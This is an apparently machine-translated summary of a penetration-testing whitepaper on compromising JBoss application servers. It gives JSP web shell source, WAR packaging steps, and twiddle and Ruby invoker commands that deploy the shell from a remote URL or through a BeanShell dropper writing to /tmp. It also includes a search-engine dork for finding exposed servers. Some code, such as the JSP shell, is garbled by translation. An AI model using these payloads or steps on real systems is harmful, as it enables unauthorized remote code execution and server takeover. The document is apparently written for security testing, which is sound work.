JBoss security question Summary

0x00 Introduction

JBoss AS is a widely used open-source Java application server.

It is part of JBoss Enterprise middleware (JEMS) and is often used in large enterprises.

This software is highly modular and loosely coupled, making it very complicated and easy to target attackers.

From the attacker's perspective, this article points out the potential risks of the JBoss application server, and uses examples to explain how to execute arbitrary code on the JBoss application server.

0x01 JBoss Overview

JBoss application server is based on Java Enterprise 1.4 and can be installed on many operating systems, including Linux, FreeBSD, and Windows, as long as the Java Virtual Machine is installed in the operating system.

JBoss Application Service Architecture

Java Management extension (JMX)

Java Management extension (JMX) is a standardized architecture that monitors and manages Java applications. JMX is divided into three layers:

JMX Architecture

Instrumentation Level: defines the information model. In JMX, various management objects exist as management components. When you need to manage them, register them with the MBean server. This layer also defines the notification mechanism and some auxiliary Metadata classes.

Agent Level: mainly defines various services and communication models. The core of this layer is an MBean server. All management components must be registered with it to be managed. The management component registered on the MBean server does not directly communicate with remote applications. They communicate with the connector through Protocol adapters. Protocol adapters and connectors can also be registered with MBean servers as management components to provide corresponding services.

Distributed Service Level: it mainly defines management interfaces and components that can operate on the proxy layer, so that managers can operate on the proxy. However, the current JMX specification does not provide specific specifications for this layer.

JMX Invoker

Invokers allows client applications to send any protocol JMX requests to the server.

All these calls use MBean Services sent from the MBean server to the response.

The transmission mechanism is transparent and any protocol such as HTTP, SOAP2, or JRMP3 can be used.

Deployer Architecture

Attackers are particularly interested in the Deployers module on the JBoss application server.

They are used to deploy different components.

The installation components in this article are as follows:

JAR (Java ARchives): the JAR file format is based on the popular ZIP file format. Unlike ZIP files, JAR files are not only used for compression and release, but also for deployment and encapsulation of libraries, components, and plug-in programs, and can be directly used by tools such as compilers and JVM. JAR contains special files, such as manifests and deployment descriptor, to indicate how the tool handles specific JAR.

WAR (Web ARchives): a WAR file is a JAR file that contains components of a Web application, similar to Java ServerPages (JSP), Java classes, and static web pages.

BSH (BeanSHell scripts): BeanShell is a Java scripting language. BeanShell scripts use Java syntax and run on JRE.

The most important JBoss Application Server deployer is MainDeployer. It is the main entry point for component deployment.

The path of the deployment component passed to MainDeployer is in the URL format:
 

org.jboss.deployment.MainDeployer.deploy(String urlspec)

MainDeployer downloads the object and determines what kind of SubDeployer Forwarding is used.

Based on the component type, SubDeployer (such as JarDeployer and SarDeployer) accepts the object for installation.

To facilitate deployment, you can use urldeploymentmetrics, which also obtains a URL as the parameter:
 

org.jboss.deployment.scanner.URLDeploymentScanner.addURL(String urlspec)

The imported URL is regularly checked for new installation or changes.

This is how JBoss application server implements hot deployment. new or changed components are automatically deployed.

0x02 attacks WAR File

The simplest way to run your code on the JBoss application server is to deploy a component. JBoss can install the component through HTTP.

The WAR package must contain a web. xml file in the WEB-INF directory, out of the actual application code directory.

This is a description file that describes what URLs will be found in subsequent applications.

You can use the Java SDK jar command to create a WAR file:
 

$ jar cvf redteam.war WEB-INF redteam.jsp

Structure directory of redteam. war:

|-- META-INF|   -- MANIFEST.MF|-- WEB-INF|   -- web.xml -- redteam.jsp

META-INF/MANIFEST. MF is automatically created when a file is created using jar, including JAR information, such as the main entry point of the application (the class to be called) or what additional classes are required. The file generated here contains no special information and only some basic information:

Manifest-Version: 1.0 Created-By: 1.6.0_10 (Sun Microsystems Inc.) 

WEB-INF/web. the xml file must be created manually. It contains information about Web applications, such as JSP files or more detailed application description. If an error occurs, icon display or error page name

 

<?xml version="1.0" ?><web-app xmlns="http://java.sun.com/xml/ns/j2ee"         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee             http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"         version="2.4">    <servlet>        <servlet-name>RedTeam Shell</servlet-name>        <jsp-file>/redteam.jsp</jsp-file>    </servlet></web-app>

Redteam content: <% @ page import = "java. util. *, java. io. *" %> <% if (request. getParameter ("cmd ")! = Null) {String cmd = request. getParameter ("cmd"); Process p = runtime.getruntime(cmd.exe c (cmd); OutputStream OS = p. getOutputStream (); InputStream in = p. getInputStream (); DataInputStream dis = new DataInputStream (in); String disr = dis. readLine (); while (disr! = Null) {out. println (disr); disr = dis. readLine () ;}%>

HTTP request:

/redteam.jsp?cmd=ls

All files in the current directory will be listed. After the command is executed, the result will be returned using the following code:

while ( disr != null ) {  out.println(disr);  disr = dis.readLine();}

JMX Console

The JMX console allows you to directly interact with the JBoss application server through a web browser.

It can easily manage the JBoss server. MBean attributes and methods can be called directly, as long as the parameters do not contain complex parameter types.

JMX console default Interface

This is usually the first target of an attacker.

Server-And ServerInfo-MBean

MBeans attributes

jboss.system:type=Serverjboss.system:type=ServerInfo

Displays information about the JBoss application server and host system, including the type and version of the Java Virtual Machine and operating system.

MBean attributes

The JMX console is readable and operable to MBeans. It not only contains information about the JBoss application server, but also host information, which helps further attacks.

The shutdown () method of MBean can shut down the JBoss Application Server. Unauthorized JMX interfaces can cause DoS attacks.

Redteam. war Installation

The method attribute of MainDeployer can be called in jboss. system on the JMX console.

The deploy () method can be called by a parameter in a URL. The URL points to the WAR file, which must be the address accessible by the server.

When the invoke button is clicked, The JBoss application server will download the WAR file and install it. Then, you can run the shell command.

Deploy () method

Run the ls-l command in the JBoss application.

RMI: Remote method call

Generally, a password is used to protect the JMX console.

However, this is not the only way to access the JBoss application server components. The JBoss Application Server often calls each other with client program interfaces, and the Java remote method call (RMI) also plays an important role.

With RMI, local applications can access remote objects and call their methods. The communication between the client and the server is transparent.

Java Naming and Directory Interface is an API designed for applications. It provides developers with a universal and unified Interface for searching and accessing various Naming and Directory services, JDBC is built on the abstraction layer.

The available directories and services that can be accessed by JNDI are:

DNS, XNam, Novell Directory Service, LDAP (Lightweight Directory Access Protocol light Directory Access Protocol), the Registry, RMI, DSML v1 & v2, and NIS of the CORBA object service, file system, Windows XP/2000/NT/Me/9x.

Access MBean through RMI

RMI interfaces are enabled on port 4444 by default, and JNDI interfaces are enabled on ports 1098 and 1099 by default.

Communicates with the JBoss Application Server RMI and can use special Java programs. The simpler method is to use twiddle, including JBoss Application Server installation.

$ sh jboss-4.2.3.GA/bin/twiddle.sh -hA JMX client to ’twiddle’ with a remote JBoss server.usage: twiddle.sh [options] <command> [command_arguments]options:    -h, --help                   Show this help message        --help-commands          Show a list of commands    -H=<command>                 Show command specific help-c=command.properties            Specify the command.properties file to use-D<name>[=<value>]               Set a system property--                               Stop procession options-s, --server=<url>               The JNDI URL of the remote server-a, --adapter=<name>             The JNDI name of the RMI adapter to user-u, --user=<name>                Specify the username for authentication-p, --password=<name>            Specify the password for authentication-q, --quiet                      Be somewhat more quiet

With twiddle, you can use the available command line to call the MBeans of the JBoss application server through RMI. In Windows, it is twiddle. bat, and in Linux, It is twiddle. sh to start twiddle. Similar to the JMX console, MBEAN attributes can be read and modified and its methods can be called.

Display MBean Server Information

$ ./twiddle.sh -s scribus get jboss.system:type=ServerInfoActiveThreadCount=50AvailableProcessors=1OSArch=amd64MaxMemory=518979584HostAddress=127.0.1.1JavaVersion=1.6.0_06OSVersion=2.6.24-19-serverJavaVendor=Sun Microsystems Inc.TotalMemory=129957888ActiveThreadGroupCount=7OSName=LinuxFreeMemory=72958384HostName=scribusJavaVMVersion=10.0-b22JavaVMVendor=Sun Microsystems Inc.JavaVMName=Java HotSpot(TM) 64-Bit Server VM

Install redteam. war

Use the deploy () method to install the war File Based on twiddle's help.

$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy http://www.redteam-pentesting.de/redteam.war

Use the following URL to access the shell:

http://scribus:8080/redteam/redteam-shell.jsp

BSHDeployer

Using RMI attacks requires the JBoss application server to be able to access the remote HTTP server.

However, in many configurations, the firewall does not allow the JBoss server to send external connection requests:

To be able to install redteam. war on the JBoss server, this file must be stored locally.

Although JBoss does not allow direct file upload, BeanShellDeployer can create arbitrary files on the remote server.

BeanShell

BeanShell is a scripting language running on JRE. It supports regular Java syntax. It can be written quickly without compilation.

BSHDeployer

In the JBoss server, BSHDeployer can deploy the BeanShell script, which is automatically executed after installation.

The BSHDeployer installation method is as follows:

createScriptDeployment(String bshScript, String scriptName)

BeanShell script

You can use the following BeanShell script to place redteam. war on the JBoss server.

import java.io.FileOutputStream;import sun.misc.BASE64Decoder;// Base64 encoded redteam.warString val = "UEsDBBQACA[...]AAAAA";BASE64Decoder decoder = new BASE64Decoder();byte[] byteval = decoder.decodeBuffer(val);FileOutputStream fs = new FileOutputStream("/tmp/redteam.war");fs.write(byteval);fs.close();

The val variable is a base64 encoded string of the redteam. war file. The script generates the redteam. war file under the tmp directory. In Windows, enter C: \ WINDOWS \ TEMP \.

Install the redteam. war File

Using twiddle, you can use the createScriptDeployement () method of DSHDeployer:

$ ./twiddle.sh -s scribus invoke jboss.deployer:service=BSHDeployer createScriptDeployment "‘cat redteam.bsh‘" redteam.bsh 

Tedteam. bsh contains the above BeanShell script. After the call is successful, the JBoss server returns the temporary file address created by BeanShell:

file:/tmp/redteam.bsh55918.bsh 

After the BeanShell script is deployed, the/tmp/redteam. war file is created. Now you can call the local file to deploy it:

$ ./twiddle.sh -s scribus invoke jboss.system:service=MainDeployer deploy file:/tmp/redteam.war 

Then you can access the redteam-shell.jsp to execute the command.

Web Console Invoker

JMX console and RMI are the most common methods to control JBoss servers.

In addition to these APIs, JMXInvoker is used in the Web console.

Web Console

The Web Console is similar to the JMX console and can also be accessed through a browser.

Default Web Console interface:

If the JMX console is password-protected, MBean functions cannot be accessed through the Web console and can be accessed only after login.

Web Console JMX Invoker

In addition to the makeup interface and JBoss server information, the Web console can monitor the real-time changes of MBean attributes.

Access URL:

http://$hostname/web-console/Invoker 

This Invoker is actually a JMX Invoker, not limited to the functions provided by the Web console.

By default, access is unrestricted, so attackers can use it to send arbitrary JMX commands to the JBoss server.

Install redteam. war

Use Invoker on the Web Console to install the redteam. war file.

Webconsole_invoker.rb can directly call the JMX Invoker of Web control. The Java class used is org. jboss. console. remote. Util.

Util. class file belongs to the JAR file of the JBoss server: console-mgr-classes.jar, it provides the method:

public static Object invoke(    java.net.URL externalURL,    RemoteMBeanInvocation mi)public static Object getAttribute(    java.net.URL externalURL,    RemoteMBeanAttributeInvocation mi)

You can use the Web Console Invoker to read MBean attributes and invoke methods.

This class can be used through the webconsole_invoker.rb script. The usage is as follows:

$ ./webconsole_invoker.rb -hUsage: ./webconsole_invoker.rb [options] MBean-u, --url URL  The Invoker URL to use (default:http://localhost:8080/web-console/Invoker)-a, --get-attr ATTR             Read an attribute of an MBean-i, --invoke METHOD             invoke an MBean method-p, --invoke-params PARAMS      MBean method params-s, --invoke-sigs SIGS          MBean method signature-t, --test                      Test the script with the ServerInfo MBean-h, --help                      Show this helpExample usage:./webconsole_invoker.rb -a OSVersion jboss.system:type=ServerInfo./webconsole_invoker.rb -i listThreadDump jboss.system:type=ServerInfo./webconsole_invoker.rb -i listMemoryPools -p true -s boolean jboss.system:type=ServerInfo

Run the following command to install the redteam. war file using BSHDeployer.

$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i createScriptDeployment -s "java.lang.String","java.lang.String" -p "`cat redteam.bsh`",redteam.bsh jboss.deployer:service=BSHDeployer

Create a local redteam. war file on the remote server. Now the second part can use MainDeployer to install the/tmp/redteam. war file.

$ ./webconsole_invoker.rb -u http://scribus:8080/web-console/Invoker -i deploy -s "java.lang.String" -p "file:/tmp/redteam.war" jboss.system:service=MainDeployer

Redteam-shell.jsp can access again.

JMXInvokerServlet

As mentioned before, the JBoss server allows any protocol to access the MBean server. For HTTP, JBoss provides HttpAdaptor.

By default, HttpAdaptor is not enabled, but JMX Invoker of HttpAdaptor can be directly accessed through URL.

http://$hostname/invoker/JMXInvokerServlet 

This interface is forwarded to MBean after an http post request is accepted. Therefore, similar to the Web Console Invoker, JMXInvokerServlet can also send any JMX call to the JBoss server.

Create an externalledinvocation object

JMXInvokerServlet is not compatible with the Web Console Invoker, so it cannot be called using the webconsole_invoker.rb script.

The externalledinvocation object is usually only used for communication on the internal JBoss server.

The httpinvoker. rb script is similar to the webconsole_invoker.rb script, but the JBoss server needs to activate HttpAdaptor.

$ ./httpinvoker.rb -hUsage: ./httpinvoker.rb [options] MBean-j, --jndi URL               The JNDI URL to use (default:http://localhost:8080/invoker/JNDIFactory)-p, --adaptor URL            The Adaptor URL to use (default:jmx/invoker/HttpAdaptor)-a, --get-attr ATTR          Read an attribute of an MBean-i,  --invoke METHOD         invoke an MBe an method               --invoke-params PARAMS  MBean method params-s, --invoke-sigs SIGS       MBean method signature-t, --test                   Test the script with the ServerInfo MBean-h, --help                   Show this help

Install tedteam. war

Similar to installing webconsole_invoker.rb.

How to find the JBoss Server:

inurl:"jmx-console/HtmlAdaptor"intitle:"Welcome to JBoss"

From: Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN